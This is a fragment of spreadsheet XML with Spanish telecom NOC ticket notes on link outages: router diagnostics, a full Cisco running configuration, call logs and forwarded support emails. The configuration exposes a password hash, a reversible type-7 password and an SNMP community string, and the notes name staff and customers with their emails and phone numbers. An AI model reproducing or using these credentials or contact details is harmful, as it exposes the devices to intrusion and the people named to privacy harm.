INTERNET  10.72.90.156            9   3458.40C8.3F9C  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.123.20            -   D48C.B588.7021  ARPA   GIGABITETHERNET0/1
INTERNET  10.138.49.17            -   D48C.B588.7023  ARPA   VLAN1
INTERNET  10.138.49.22            0   F08E.DB17.9096  ARPA   VLAN1
INTERNET  10.168.49.126           -   D48C.B588.7023  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0849#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8901328T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8901745T/_/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849#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.90.135    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.72.123.20    YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.120.243  YES NVRAM  UP                    UP
VLAN1                      10.168.49.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0849#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.90.135
  PING 10.72.90.135: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.90.135 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/17 MS
RUTA IP:
PE: 10.179.28.73
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.90.135
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.90.135/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>F4614754</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SIN PERDIDAS  UN POCO DE LATENCIAS PERO ES POR QUE ES UN ENLACE INALAMBRICO Y DEPENDE DE LA OPTIMA RECEPCIOND E SEÑAL LA SIM CARD
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -VPN-INSTANCE TRANSFERENCIAS 10.218.54.68
  PING 10.218.54.68: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.54.68: BYTES=56 SEQUENCE=1 TTL=58 TIME=10 MS
    REPLY FROM 10.218.54.68: BYTES=56 SEQUENCE=2 TTL=58 TIME=295 MS
    REPLY FROM 10.218.54.68: BYTES=56 SEQUENCE=3 TTL=58 TIME=58 MS
    REPLY FROM 10.218.54.68: BYTES=56 SEQUENCE=4 TTL=58 TIME=273 MS
    REPLY FROM 10.218.54.68: BYTES=56 SEQUENCE=5 TTL=58 TIME=8 MS
  --- 10.218.54.68 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 8/128/295 MS
&lt;GNCYGTG2N2D4A05A15EIM10&gt;
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DIS IP RO VP TRANSFERENCIAS 10.218.54.68
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.218.48.0/21  STATIC  1    0             RD  10.174.203.36   VLANIF3235</t>
  </si>
  <si>
    <t>F4614778</t>
  </si>
  <si>
    <t>***--- SE LLAMA A ELIAS SIERRA 504 94560221 PERO NO CONTESTA --**
1001990848</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE ENVÍA GRAFICA EN COLA DE CORREOS, INDICANDO QUE EL SERVICIO SIGUE ALARMADO, SE LE INDICA QUE CNOC RESPONDERÁ*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: VIERNES, 24 DE JUNIO DE 2022 11:27
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
BUENOS DÍAS JUAN ELÍAS,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
--------------------------------
DE: JUAN ELIAS SIERRA ORTIZ [MAILTO:JUAN.SIERRA@SOMOSCMI.COM]
ENVIADO EL: VIERNES, 24 DE JUNIO DE 2022 11:14
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
SEÑORES,
AUN OBSERVAMOS ALARMADO ESTE ENLACE,
SALUDOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELIAS SIERRA 504 94560221 NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 1001995043
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVYN CHAY AL 47700119 INDICA QUE NO TIENE CONOCIMIENTO DEL REPORTE SE LLAMA A CENTRAL PARA CONFIRMAR **
-ID 2001029700
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE VALIDARÁ COMPORTAMIENTO DEL SERVICIO CON PR HASTA EL DÍA LUNES A LAS 08:00AM; CLIENTE CENTRAL ENTERADO VÍA CORREO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ELIAS SIERRA ORTIZ AL 504 94560221 INDICA QUE AUN VE EL ENLACE CAIDO Y QUE NO ES PROBLEMA DE ENERGIA PORQUE EL OTRO ESTA FUNCIONANDO SOLICITA QUE SI TAMBIEN SE LE PUEDE CONTACTAR VIA CORREO YA QUE HAY VECES QUE NO RESPONDE EL CELULAR || SE NOTIFICA A GESTOR
-ID 2001030397
**</t>
  </si>
  <si>
    <t>F4614779</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER ALBERTO GONZÁLEZ RODRÍGUEZ AL 2239-9709 || NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001047396
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER ALBERTO GONZÁLEZ RODRÍGUEZ AL 2239-9709 || NO RESPONDE | SE INTENTARA LUEGO, CLIENTE AUN NO RESPONDE CORREO**
-ID 1001995280
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER ALBERTO GONZÁLEZ RODRÍGUEZ AL 2239-9709 || NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001068874
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER 2239-9709 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001074424</t>
  </si>
  <si>
    <t>F4614801</t>
  </si>
  <si>
    <t>AFECTACION: CAIDA PARCIAL
CAUSA O RAIZ: ENERGIA COMERCIAL
QUE SE REALIZO PARA SOLUCIONAR:NO SE REALIZAN CAMBIOS
UNICENTRO#PING VRF TYT 192.168.120.146
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.120.146, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS</t>
  </si>
  <si>
    <t>F4614803</t>
  </si>
  <si>
    <t>****---  TELMEX AUTORIZA CIERRE --***
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: VIERNES, 24 DE JUNIO DE 2022 04:16
PARA: BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI003167 ::: LATENCIA Y PERDIDA DE PAQUETES."
HOLA TEAM
GRACIAS, ADELANTE CON EL CIERRE DEL TICKET.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>F4614862</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA EL SEÑOR ESTUARDO HERNANDEZ INDICA QUE AUN LO VE DOWN QUE NO LE LLEGA || SOLICITA QUE SI A NIVEL DE CLARO SE VE UP QUE SE LE PUEDAN COMPARTIR PRUEBAS|| SE NOTIFICA A GESTOR **
-ID 1001996474
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 525551745299  MENCIONA QUE YA OBSERVAN OPERATIVO EL SERVICIO, PERO ESTAN A LA ESPERA DE VALIDACION POR PARTE DE CLIENTE FINAL
-ID 2001136368</t>
  </si>
  <si>
    <t>F4614990</t>
  </si>
  <si>
    <t xml:space="preserve">SE ENC UENTRA OPERATIVO EL SERVICIO POR PARTE DE CLARO TODO OL SE ENCONTRO UNA ALARMA DE REINICIO EN EL EQUIPO CPE SE PROCEDE CON CIERRE DE ENERGIA COMECIAL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 10 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 19-MAR-14 11:56 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_GMG_GT_INTERNET_POPTUN UPTIME IS 10 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.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17823Z
6 GIGABIT ETHERNET INTERFACES
3 TERMINAL LINES
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
2 CELLULAR INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1921/K9          FTX1817823Z
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    PERMANENT      SECURITYK9
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_GMG_GT_INTERNET_POPTUN#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2384 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_GMG_GT_INTERNET_POPTUN
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$87WJ$V/N53RPACTMITMHFJUOVL/
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX1817823Z
!
!
USERNAME GESTIONIP PASSWORD 7 011D23534C5B140465
!
REDUNDANCY
!
!
!
!
!
CONTROLLER CELLULAR 0/1
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.159.7 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/313900299T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.174.142.82 255.255.255.240
 IP VIRTUAL-REASSEMBLY IN
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 216.230.140.85 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/0/0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/2
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/3
 NO IP ADDRESS
!
INTERFACE CELLULAR0/1/0
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
INTERFACE CELLULAR0/1/1
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
INTERFACE VLAN1
 NO IP ADDRESS
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.142.81
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_5 CALLE Y 6 AVENIDA ESQUINA ZONA 1 POTUN PETEN
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!
!
!
LINE CON 0
 LOGIN LOCAL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE 0/1/0 0/1/1
 NO EXEC
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_GMG_GT_INTERNET_POPTUN#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 28 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 28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8192 BYTES):
*JAN  2 00:00:03.103: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JAN  2 00:00:03.295: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
*JUN 24 07:46:39.131: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN 24 07:47:07.207: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*JUN 24 07:47:07.211: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*JUN 24 07:47:08.163: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 24 07:47:08.163: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 24 07:47:08.987: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN 24 07:47:09.163: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 24 07:47:09.163: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 24 07:47:13.271: %CELLWAN-2-SIM_FAILURE: [CELLULAR0/1/0]: SIM READ FAILED
*JUN 24 07:47:13.343: %CELLWAN-2-MODEM_UP: MODEM IN HWIC SLOT 0/1 IS NOW UP
*JUN 24 07:47:13.351: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*JUN 24 01:47:15.927 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 07:47:15 UTC FRI JUN 24 2022 TO 01:47:15 GUA FRI JUN 24 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*JUN 24 01:47:16.067 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN 24 01:47:16.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN 24 01:47:18.003 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 24 01:47:19.011 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN 24 01:47:19.131 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 24 01:47:19.131 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 24 01:47:19.183 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO DOWN
*JUN 24 01:47:19.183 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO DOWN
*JUN 24 01:47:20.319 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 19-MAR-14 11:56 BY PROD_REL_TEAM
*JUN 24 01:47:20.367 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_INTERNET_POPTUN IS UNDERGOING A COLD START
*JUN 24 01:47:20.999 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUN 24 01:47:20.999 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
*JUN 24 01:47:20.999 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUN 24 01:47:20.999 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
CC_GMG_GT_INTERNET_POPTUN#
SHOW CLOCK
*01:56:46.851 GUA FRI JUN 24 2022
CC_GMG_GT_INTERNET_POPTUN#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.142.81           4   084F.0AC8.68CD  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.142.82           -   D072.DC2B.BC20  ARPA   GIGABITETHERNET0/0
INTERNET  216.230.140.85          -   D072.DC2B.BC21  ARPA   GIGABITETHERNET0/1
INTERNET  216.230.140.86          0   0C8D.DBAF.F2DD  ARPA   GIGABITETHERNET0/1
CC_GMG_GT_INTERNET_POPTUN#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900299T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
GI0/0/0                        DOWN           DOWN
GI0/0/1                        DOWN           DOWN
GI0/0/2                        DOWN           DOWN
GI0/0/3                        DOWN           DOWN
CE0/1/0                        DOWN           DOWN
CE0/1/1                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            DOWN           DOWN
CC_GMG_GT_INTERNET_POPTUN#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.174.142.82   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         216.230.140.85  YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  DOWN                  DOWN
CELLULAR0/1/0              UNASSIGNED      YES UNSET  DOWN                  DOWN
CELLULAR0/1/1              UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.159.7    YES NVRAM  UP                    UP
VLAN1                      UNASSIGNED      YES UNSET  DOWN                  DOWN
CC_GMG_GT_INTERNET_POPTUN#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.174.142.82
  PING 10.174.142.82: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.142.82 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.71
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.142.82
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.142.82/32  DIRECT  0    0                 0.0.0.0         VLANIF2205			</t>
  </si>
  <si>
    <t>F4614992</t>
  </si>
  <si>
    <t>***--- TELMEX COMPARTE CONTACTOS LOCALES --***
DE: TREJO GUTIERREZ ANGEL [MAILTO:TGANGEL@UNINET.COM.MX]
ENVIADO EL: VIERNES, 24 DE JUNIO DE 2022 04:53
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 604400001::: TICKET CNOC IMSAI001334::: "FUERA DE SERVICIO"
BUEN DÍA TEAM.
LES COMPARTO LOS CONTACTOS EN SITIO.
OSCAR TECUM
P: 502 22293600 EXT. 3634
M: 502-59170658
IRAD DE LEON
P: 502 22293600 EXT 3603
M: 502 55019507</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO, NO CONTESTA; SE LE PIDE APOYO DE NUEVO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 604400001::: TICKET CNOC IMSAI001334::: "FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A EDWIN SÁNCHEZ/CLIENTE CONSULTANDO CÓMO SE VE COMPORTAMIENTO DEL SERVICIO, PUES DEL LADO DE ELLOS PERSISTE LO REPORTADO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA SE LES LLAMÓ DOS VECES, NO CONTESTAN. DEBIDO A QUE NO SE TUVO APOYO DE ÉSTOS, SE ESCALA CON KEVYN FONSECA/TEAM LEADER N1, INDICA QUE NOS APOYARÁ.</t>
  </si>
  <si>
    <t>***--- TELMEX RESPONDE CORREO  E INIDICA CONTACTOS LOCALES ---**
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 00:12
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; TREJO GUTIERREZ ANGEL &lt;TGANGEL@UNINET.COM.MX&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 604400001::: TICKET CNOC IMSAI001334::: "FUERA DE SERVICIO"
ESTIMADOS,
DESPUÉS DE REALIZAR EL CHECKLIST, NO SE ENCONTRÓ ERROR EN EL SITIO Y CONTINÚA CAÍDO:
+
RT55LA04F2TN#SH INT TU239
TUNNEL239 IS UP, LINE PROTOCOL IS DOWN
  HARDWARE IS TUNNEL
  DESCRIPTION: GRE OSPF TUNNEL TO TARJETAS DE CREDITO DE OCCIDENTE - RTLAGT17222B
  INTERNET ADDRESS IS 10.244.140.17/28
  MTU 9976 BYTES, BW 2048 KBIT/SEC, DLY 50000 USEC,
     RELIABILITY 255/255, TXLOAD 1/255, RXLOAD 1/255
+
